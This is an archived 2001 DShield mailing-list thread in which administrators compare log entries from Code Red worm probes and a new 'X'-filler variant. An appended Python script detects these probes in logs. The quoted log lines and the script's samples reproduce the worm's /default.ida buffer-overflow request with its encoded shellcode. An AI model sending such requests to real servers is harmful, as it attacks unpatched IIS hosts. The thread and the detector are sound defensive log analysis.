[Dshield] Code Red Host Scans (and more)

Scott Johnson scott at advancedtool.com
Sat Aug 4 18:42:41 GMT 2001


I too have been hit a couple hundred times with this request. The first
one I received was at 13:25 EST on 8/4 with this log entry.

2001-08-04 13:25:14 24.101.45.59 - 24.161.108.188 80 GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u90
90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

After that it was MANY IPs from my local subnet on Time Warner/RoadRunner.
Once these "X" packets, as I call them, started, the "N" packets were VERY few
and far between.

Could this worm be morphing itself in an attempt to avoid detection?  It
doesn't appear to be any more successful than its predecessor on patched
systems.

Scott Johnson

----- Original Message -----
From: "John Groseclose" <iain at caradoc.org>
To: <dshield at dshield.org>
Sent: Saturday, August 04, 2001 11:31 AM
Subject: [Dshield] Code Red Host Scans (and more)


> At 6:41 PM -0400 8/2/01, Tim Dwayne Southard wrote:
> My IDS (Cisco Secure) is not detecting the host scans from infected
> machines.  I can see the default.ida?NNN stuff but I think that is
> the second stage (infection).  I need to see the port 80 scans
> regardless of whether they are scanning MS boxes.  Any assistance
> will be repaid with good Karma.
>
> The "scan" *is* the "exploit." Code Red doesn't check first to see if
> you're running IIS before attempting to infect. There are no primary
> or secondary stages to the Code Red worm - it either infects your
> machine, or it doesn't.
>
> The weirder part is this... A "normal" Code Red attempt looks like this:
>
> cx215003-b.wwck1.ri.home.com - - [01/Aug/2001:04:31:50 -0700] "GET
> /default.ida?
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858
%ucb
>
d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u
00c3
> %u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 324 "-" "-"
>
> Since 12:44:09 GMT, I've been receiving *these* in my logs:
>
> h-64-105-129-178.lsancaba.covad.net - - [04/Aug/2001:05:44:09 -0700]
> "GET /defau
>
lt.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u909
0%u6
>
858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%
u819
> 0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-"
"-"
> www.sacramentochats.com - - [04/Aug/2001:06:08:15 -0700] "GET
> /default.ida?XXXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd
3%u7
>
801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%
u000
> 3%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 277 "-" "-"
>
> It *looks* like the second worm is trying to reboot the machine via
> an exploit for cmd.exe, but since I don't have any Windows machines
> around to work with, I can't really do any experimentation with it.
> Perhaps someone wrote a "counter-worm."
> --
> John Groseclose
> iain at caradoc.org
>
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www1.dshield.org/mailman/listinfo/dshield
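As an added defender-side illustration that is not part of either message above: a small Python script that picks the two probe shapes the thread describes (the "N" and "X" filler runs into /default.ida, followed by the same %u-encoded payload prefix) out of both log formats shown, Scott's IIS W3C lines and John's Apache lines, and counts hits per source. The 100-byte filler threshold, the sample lines and the documentation addresses in them are constructed assumptions, not data from the thread.

```python
import re
from collections import Counter

# Both probe variants in the thread overflow IIS's .ida ISAPI extension with a long
# run of one filler byte ('N' in the original worm, 'X' in the new one) followed by
# the same %u-encoded payload prefix. IIS W3C logs separate uri-stem and uri-query
# with a space while Apache keeps the '?', so both separators are accepted.
CODE_RED_RE = re.compile(
    r"GET /default\.ida[ ?](?P<filler>N{100,}|X{100,})%u9090%u6858%ucbd3%u7801"
)
# IIS W3C extended format: date time c-ip - s-ip s-port method uri-stem uri-query status
IIS_RE = re.compile(r"^\d{4}-\d{2}-\d{2} \S+ (?P<src>\d{1,3}(?:\.\d{1,3}){3}) ")
# Apache common/combined format: host ident user [timestamp] "request" status bytes
APACHE_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "')


def classify(line):
    """Return {'src', 'variant', 'filler_len'} for a Code Red probe, else None."""
    m = CODE_RED_RE.search(line)
    if not m:
        return None
    src = "unknown"
    for fmt in (IIS_RE, APACHE_RE):
        h = fmt.match(line)
        if h:
            src = h.group("src")
            break
    filler = m.group("filler")
    return {"src": src, "variant": filler[0], "filler_len": len(filler)}


def summarize(lines):
    """Count probes per (variant, source) so a burst of 'X' hits from one subnet stands out."""
    counts = Counter()
    for line in lines:
        hit = classify(line)
        if hit:
            counts[(hit["variant"], hit["src"])] += 1
    return counts


# Constructed sample lines (RFC 5737 documentation addresses and an example.net host,
# not real machines); the 224-byte filler assumed here mirrors the shape of the entries
# quoted in the thread, and the payload prefix is the one visible in those entries.
PAYLOAD = "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a"
SAMPLE_LOG = [
    "2001-08-04 13:25:14 192.0.2.10 - 192.0.2.1 80 GET /default.ida " + "X" * 224 + PAYLOAD + " 200 -",
    "2001-08-04 13:26:02 192.0.2.11 - 192.0.2.1 80 GET /default.ida " + "X" * 224 + PAYLOAD + " 200 -",
    'host.example.net - - [04/Aug/2001:05:44:09 -0700] "GET /default.ida?' + "N" * 224 + PAYLOAD + ' HTTP/1.0" 400 324 "-" "-"',
    'host.example.net - - [04/Aug/2001:06:08:15 -0700] "GET /index.html HTTP/1.0" 200 1043 "-" "-"',
]

if __name__ == "__main__":
    for (variant, src), n in sorted(summarize(SAMPLE_LOG).items()):
        print(f"variant={variant} src={src} hits={n}")
```

A web server that has no .ida handler answers these with 400/404 (as in John's Apache log) and is not infected, so the counts are a measure of who is probing you, not of your own exposure.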